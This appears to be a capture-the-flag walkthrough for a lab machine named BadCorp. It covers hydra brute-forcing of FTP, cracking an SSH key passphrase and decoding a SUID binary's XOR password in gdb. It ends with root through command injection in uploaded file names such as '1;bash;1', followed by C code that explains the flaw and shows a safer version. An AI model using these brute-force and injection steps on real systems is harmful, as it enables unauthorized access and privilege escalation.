# BadCorp

`enumeration` `reverse` `hydra` `suid` `command injection`

* Machine name: BadCorp
* Difficulty: Hard
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 05:48 EDT
Nmap scan report for 192.168.210.133
Host is up (0.033s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: BadCorp| Html5 Agency template
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

We browse the site and find nothing really interesting. We did find an e-mail address, which gives us a domain name: badcorp.lo. We added it to /etc/hosts and then ran subdomain and directory enumeration, with no results.

The only page that gives us any information is about.html: it lists names and phone numbers...

We collect these names to build a username list, then try to brute-force with hydra.

```
┌──(kali㉿kali)-[~/oscp]
└─$ python ../usernames.py -w 'user.txt' > user1.txt
                                                         
┌──(kali㉿kali)-[~/oscp]
└─$ cat user1.txt
justin
hammer
j.hammer
j-hammer
j_hammer
j+hammer
jhammer
justinhammer
hammerjustin
justin.hammer
hammer.justin
                                                         
┌──(kali㉿kali)-[~/oscp]
└─$ cat pass1.txt
+23-34567890
34567890
2334567890
```

Same approach with the other users.

```
┌──(kali㉿kali)-[~/oscp]
└─$ hydra -L user3.txt -P pass3.txt ftp://badcorp.lo
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-19 06:48:57
[DATA] max 16 tasks per 1 server, overall 16 tasks, 33 login tries (l:11/p:3), ~3 tries per task
[DATA] attacking ftp://badcorp.lo:21/
[21][ftp] host: badcorp.lo   login: hoswald   password: 34566550
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-19 06:49:13
```

Bingo!

## Initial access

```
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.210.133
Connected to 192.168.210.133.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 06:49. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.210.133:kali): hoswald 
331 User hoswald OK. Password required
Password: 
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Extended Passive mode OK (|||32235|)
150 Accepted data connection
-rwxrwxr--    1 0          0                1766 Feb 24  2021 id_rsa
226-Options: -l 
226 1 matches total
ftp> mget id_rsa
mget id_rsa [anpqy?]? 
229 Extended Passive mode OK (|||61027|)
150 Accepted data connection
100% |***************|  1766        1.21 MiB/s    00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 3.15 Mbytes per second
1766 bytes received in 00:00 (587.80 KiB/s)
ftp> exit
221-Goodbye. You uploaded 0 and downloaded 2 kbytes.
221 Logout.
```

```
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh oswald@badcorp.lo -i id_rsa
The authenticity of host 'badcorp.lo (192.168.210.133)' can't be established.
ED25519 key fingerprint is SHA256:mqPCrimr9j626KOGoHM+qxgHUOYD4pu1+4KzhIvu5uA.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:8: [hashed name]
    ~/.ssh/known_hosts:10: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'badcorp.lo' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
```

The key is protected by a passphrase.

```
┌──(kali㉿kali)-[~/oscp]
└─$ ssh2john id_rsa > hash.txt
┌──(kali㉿kali)-[~/oscp]
└─$ john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
developer        (id_rsa)     
1g 0:00:00:00 DONE (2024-08-19 08:45) 25.00g/s 3754Kp/s 3754Kc/s 3754KC/s dick13..dester
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

```
┌──(kali㉿kali)-[~]
└─$ ssh hoswald@192.168.210.133 -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux badcorp 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ id
uid=1000(hoswald) gid=1000(hoswald) groups=1000(hoswald)
```

## Privilege escalation

```
$ find / -perm -u=s 2>/dev/null
/usr/local/bin/backup
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd

$ /usr/local/bin/backup
USAGE: backup <password> 
$ /usr/local/bin/backup developer
Wrong Password !!!
```

Let's look for the password. The strings command turns up nothing of interest, so we download the binary to our machine.

```
┌──(kali㉿kali)-[~/oscp]
└─$ scp -i id_rsa hoswald@badcorp.lo:/usr/local/bin/backup .
Enter passphrase for key 'id_rsa': 
backup 
```

### Reverse

```
┌──(kali㉿kali)-[~/oscp]
└─$ gdb backup
GNU gdb (Debian 13.2-1+b2) 13.2
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from backup...
(No debugging symbols found in backup)
(gdb) set args test
(gdb) run
Starting program: /home/kali/oscp/backup test
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Wrong Password !!!
[Inferior 1 (process 16796) exited normally]
(gdb) disas main
Dump of assembler code for function main:
   0x0000555555555575 <+0>:	push   %rbp
   0x0000555555555576 <+1>:	mov    %rsp,%rbp
   0x0000555555555579 <+4>:	sub    $0x20,%rsp
   0x000055555555557d <+8>:	mov    %edi,-0x14(%rbp)
   0x0000555555555580 <+11>:	mov    %rsi,-0x20(%rbp)
   0x0000555555555584 <+15>:	mov    $0x0,%edi
   0x0000555555555589 <+20>:	call   0x5555555550d0 <setuid@plt>
   0x000055555555558e <+25>:	cmpl   $0x2,-0x14(%rbp)
   0x0000555555555592 <+29>:	jne    0x5555555555d8 <main+99>
   0x0000555555555594 <+31>:	mov    -0x20(%rbp),%rax
   0x0000555555555598 <+35>:	add    $0x8,%rax
   0x000055555555559c <+39>:	mov    (%rax),%rax
   0x000055555555559f <+42>:	mov    %rax,%rdi
   0x00005555555555a2 <+45>:	call   0x5555555551e5 <security>
   0x00005555555555a7 <+50>:	mov    %eax,-0x4(%rbp)
   0x00005555555555aa <+53>:	mov    -0x20(%rbp),%rax
   0x00005555555555ae <+57>:	add    $0x8,%rax
   0x00005555555555b2 <+61>:	mov    (%rax),%rax
   0x00005555555555b5 <+64>:	mov    %rax,%rdi
   0x00005555555555b8 <+67>:	call   0x5555555554f0 <check>
   0x00005555555555bd <+72>:	mov    %eax,-0x8(%rbp)
   0x00005555555555c0 <+75>:	cmpl   $0x0,-0x4(%rbp)
   0x00005555555555c4 <+79>:	jne    0x5555555555ea <main+117>
   0x00005555555555c6 <+81>:	cmpl   $0x0,-0x8(%rbp)
   0x00005555555555ca <+85>:	jne    0x5555555555ea <main+117>
   0x00005555555555cc <+87>:	mov    $0x0,%eax
   0x00005555555555d1 <+92>:	call   0x5555555552ab <copy>
--Type <RET> for more, q to quit, c to continue without paging--c
   0x00005555555555d6 <+97>:	jmp    0x5555555555ea <main+117>
   0x00005555555555d8 <+99>:	cmpl   $0x1,-0x14(%rbp)
   0x00005555555555dc <+103>:	jg     0x5555555555ea <main+117>
   0x00005555555555de <+105>:	lea    0xb1c(%rip),%rdi        # 0x555555556101
   0x00005555555555e5 <+112>:	call   0x555555555040 <puts@plt>
   0x00005555555555ea <+117>:	mov    $0x0,%eax
   0x00005555555555ef <+122>:	leave
   0x00005555555555f0 <+123>:	ret
End of assembler dump.
(gdb) disas check
Dump of assembler code for function check:
   0x00005555555554f0 <+0>:	push   %rbp
   0x00005555555554f1 <+1>:	mov    %rsp,%rbp
   0x00005555555554f4 <+4>:	sub    $0x30,%rsp
   0x00005555555554f8 <+8>:	mov    %rdi,-0x28(%rbp)
   0x00005555555554fc <+12>:	mov    -0x28(%rbp),%rcx
   0x0000555555555500 <+16>:	lea    -0x12(%rbp),%rax
   0x0000555555555504 <+20>:	mov    $0x9,%edx
   0x0000555555555509 <+25>:	mov    %rcx,%rsi
   0x000055555555550c <+28>:	mov    %rax,%rdi
   0x000055555555550f <+31>:	call   0x555555555030 <strncpy@plt>
   0x0000555555555514 <+36>:	movl   $0x0,-0x4(%rbp)
   0x000055555555551b <+43>:	jmp    0x555555555539 <check+73>
   0x000055555555551d <+45>:	mov    -0x4(%rbp),%eax
   0x0000555555555520 <+48>:	cltq
   0x0000555555555522 <+50>:	movzbl -0x12(%rbp,%rax,1),%eax
   0x0000555555555527 <+55>:	xor    $0xc,%eax
   0x000055555555552a <+58>:	mov    %eax,%edx
   0x000055555555552c <+60>:	mov    -0x4(%rbp),%eax
   0x000055555555552f <+63>:	cltq
   0x0000555555555531 <+65>:	mov    %dl,-0x12(%rbp,%rax,1)
   0x0000555555555535 <+69>:	addl   $0x1,-0x4(%rbp)
   0x0000555555555539 <+73>:	cmpl   $0x7,-0x4(%rbp)
   0x000055555555553d <+77>:	jle    0x55555555551d <check+45>
   0x000055555555553f <+79>:	lea    -0x12(%rbp),%rax
   0x0000555555555543 <+83>:	lea    0x2b3e(%rip),%rsi        # 0x555555558088 <pw>
   0x000055555555554a <+90>:	mov    %rax,%rdi
--Type <RET> for more, q to quit, c to continue without paging--c
   0x000055555555554d <+93>:	call   0x555555555090 <strcmp@plt>
   0x0000555555555552 <+98>:	mov    %eax,-0x8(%rbp)
   0x0000555555555555 <+101>:	cmpl   $0x0,-0x8(%rbp)
   0x0000555555555559 <+105>:	jne    0x555555555562 <check+114>
   0x000055555555555b <+107>:	mov    $0x0,%eax
   0x0000555555555560 <+112>:	jmp    0x555555555573 <check+131>
   0x0000555555555562 <+114>:	lea    0xb85(%rip),%rdi        # 0x5555555560ee
   0x0000555555555569 <+121>:	call   0x555555555040 <puts@plt>
   0x000055555555556e <+126>:	mov    $0xffffffff,%eax
   0x0000555555555573 <+131>:	leave
   0x0000555555555574 <+132>:	ret

```

We loaded the program, gave it an argument, and disassembled two functions: main and check. check is the one of interest: we need to know what the registers hold just before the call to strcmp.

We set a breakpoint at address 0x000055555555554d (call 0x555555555090 <strcmp@plt>).

```
(gdb) b * 0x000055555555554d
Breakpoint 1 at 0x55555555554d
(gdb) run
Starting program: /home/kali/oscp/backup test
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, 0x000055555555554d in check ()
(gdb) info registers
rax            0x7fffffffdd0e      140737488346382
rbx            0x7fffffffde68      140737488346728
rcx            0x0                 0
rdx            0xc                 12
rsi            0x555555558088      93824992247944
rdi            0x7fffffffdd0e      140737488346382
rbp            0x7fffffffdd20      0x7fffffffdd20
rsp            0x7fffffffdcf0      0x7fffffffdcf0
r8             0x10                16
r9             0x7ffff7fcfb30      140737353939760
r10            0x7ffff7dd84d8      140737351877848
r11            0x7ffff7f20500      140737353221376
r12            0x0                 0
r13            0x7fffffffde80      140737488346752
r14            0x7ffff7ffd000      140737354125312
r15            0x0                 0
rip            0x55555555554d      0x55555555554d <check+93>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
```

Let's look at what the rsi register points to (it is loaded two lines earlier from the variable named "pw").

```
(gdb) x/s $rsi
0x555555558088 <pw>:	"|8\177\177{<~:"
```

The password appears to be encoded. One line in the disassembly above stands out: xor $0xc,%eax. The XOR key is 0xc.

We can now decode the password.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FGxExAIh3uwipccH4OJYJ%2F4287777317912a166030a456f19750d0.png?alt=media&#x26;token=bb60cd1a-0137-4e48-a62c-a39478c5e92f" alt=""><figcaption></figcaption></figure>
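The same decoding as a worked example in C (added here, not the BadCorp binary's own source): `check` is reconstructed from the disassembly above (strncpy of 9 bytes, XOR of the first 8 with 0xc, strcmp against `pw`), and `recover_password` applies the symmetric key to the bytes gdb printed at `<pw>`. It shows why an XOR-obfuscated hard-coded secret offers no protection to anyone holding the binary.

```c
#include <stdio.h>
#include <string.h>

/* Bytes gdb printed at <pw>: "|8\177\177{<~:" (8 characters plus NUL). */
static const char pw[] = "|8\177\177{<~:";
#define XOR_KEY 0x0c /* the constant in "xor $0xc,%eax" */

/* Mirrors check(): strncpy 9 bytes into a local buffer, XOR the first 8 with
 * the key, then strcmp against pw. Returns 0 on match, -1 otherwise, like the
 * binary. The explicit terminator is added here so over-long input cannot be
 * read past the buffer; the disassembly shows no such guard. */
int check(const char *input)
{
    char buf[9];
    strncpy(buf, input, sizeof buf);
    buf[8] = '\0';
    for (int i = 0; i < 8; i++)
        buf[i] ^= XOR_KEY;
    return strcmp(buf, pw) == 0 ? 0 : -1;
}

/* XOR is its own inverse: applying the same key to pw yields the plaintext the
 * binary accepts. Any user who can read the SUID binary can do this. */
const char *recover_password(void)
{
    static char out[9];
    for (int i = 0; i < 8; i++)
        out[i] = (char)(pw[i] ^ XOR_KEY);
    out[8] = '\0';
    return out;
}

int main(void)
{
    printf("recovered: %s\n", recover_password());
    printf("check(recovered) = %d\n", check(recover_password()));
    return 0;
}
```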

Back to the binary on the victim.

```
hoswald@badcorp:/var/logs/hoswald$ strings /usr/local/bin/backup
/lib64/ld-linux-x86-64.so.2
{...}
u/UH
[]A\A]A^A_
Bad character found !
/var/logs/%s/
/home/FTP/%s/
Could not open current directory
Create destination directory
/bin/mkdir -p /var/logs/%s/
FOLDER 
%s %s
/bin/cp -rf  %s%s %s
FILE 
ALL FILE COPYED IN %s 
Wrong Password !!!
USAGE: backup <password> 
;*3$"
{<~:GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
{...}
```

The strings output shows us what the program does.

```
hoswald@badcorp:~$ /usr/local/bin/backup p4ssw0r6
Create destination directory
FILE  id_rsa
ALL FILE COPYED IN /var/logs/hoswald/ 
```

The binary copies the files present in the FTP directory into /var/logs/hoswald/. Let's see whether we can inject commands by uploading files over FTP with crafted names.

```
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami"
                                                                  
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami;"
                                                                  
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami;id"

{...}

ftp> put test;whoami;id
local: test;whoami;id remote: test;whoami;id
229 Extended Passive mode OK (|||8383|)
150 Accepted data connection
     0        0.00 KiB/s 
226 File successfully transferred

ftp> dir
229 Extended Passive mode OK (|||29312|)
150 Accepted data connection
-rwxrwxr--    1 0          0                1766 Feb 24  2021 id_rsa
-rw-r--r--    1 1006       ftpusr              0 Aug 19 10:21 test;whoami
-rw-r--r--    1 1006       ftpusr              0 Aug 19 10:21 test;whoami;
-rw-r--r--    1 1006       ftpusr              0 Aug 19 10:23 test;whoami;id

```

```
hoswald@badcorp:/var/logs/hoswald$ /usr/local/bin/backup p4ssw0r6
FILE  shell.php
FILE  test;whoami;
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
root
sh: 1: /var/logs/hoswald/: Permission denied
FILE  id_rsa
FILE  test;whoami
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
whoami: extra operand ‘/var/logs/hoswald/’
Try 'whoami --help' for more information.
FILE  reverse.elf
FILE  test;whoami;id
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
root
id: ‘/var/logs/hoswald/’: no such user
ALL FILE COPYED IN /var/logs/hoswald/ 
```

root!

All that's left is to upload a file named `"1;bash;1"`:

```
hoswald@badcorp:~$ /usr/local/bin/backup p4ssw0r6
FILE  1;bash;1
/bin/cp: missing destination file operand after '/home/FTP/hoswald/1'
Try '/bin/cp --help' for more information.
root@badcorp:~# whoami
root
```

We could also upload a file named, for example, `$(whoami)`.
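Why the injection works and how the copy should have been written, as an added C example (not the BadCorp binary's source): `build_shell_command` reproduces the risky pattern implied by the `/bin/cp -rf  %s%s %s` string seen in the strings output (a file name spliced into a command line that a shell then parses), while `filename_is_safe` and `copy_noshell` show the fix, an allow-list on the name plus cp invoked through execv with an argv array so that no shell ever sees the name. Paths follow the page (`/home/FTP/<user>/`, `/var/logs/<user>/`).

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Risky pattern: the file name is spliced into a shell command line, so sh
 * splits "1;bash;1" into "cp -rf /home/FTP/hoswald/1", "bash", and
 * "1 /var/logs/hoswald/" (hence the "missing destination file operand" error
 * on the page). Returns the string system() would receive; nothing is run. */
const char *build_shell_command(const char *dir, const char *name, const char *dst)
{
    static char cmd[1024];
    snprintf(cmd, sizeof cmd, "/bin/cp -rf  %s%s %s", dir, name, dst);
    return cmd;
}

/* Hardening step 1: allow-list the name before it is used anywhere.
 * Only [A-Za-z0-9._-], no leading '-', not "." or "..". */
int filename_is_safe(const char *name)
{
    if (name == NULL || *name == '\0' || *name == '-' || strlen(name) > 255)
        return 0;
    for (const char *p = name; *p; p++)
        if (!isalnum((unsigned char)*p) && *p != '.' && *p != '_' && *p != '-')
            return 0;
    return strcmp(name, ".") != 0 && strcmp(name, "..") != 0;
}

/* Hardening step 2: run cp directly with an argv array. No shell parses the
 * name, so ';' or '$(...)' inside it are just bytes of one argument, and "--"
 * keeps cp from treating it as an option. Returns cp's exit status, or -1 if
 * it could not be started. */
int copy_noshell(const char *src, const char *dst)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = {"/bin/cp", "-rf", "--", (char *)src, (char *)dst, NULL};
        execv(argv[0], argv);
        _exit(127); /* only reached if execv itself failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Because the real binary calls setuid(0) first, any shell it spawns runs as root; removing the shell closes that path, and the allow-list is defence in depth against other uses of the name.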
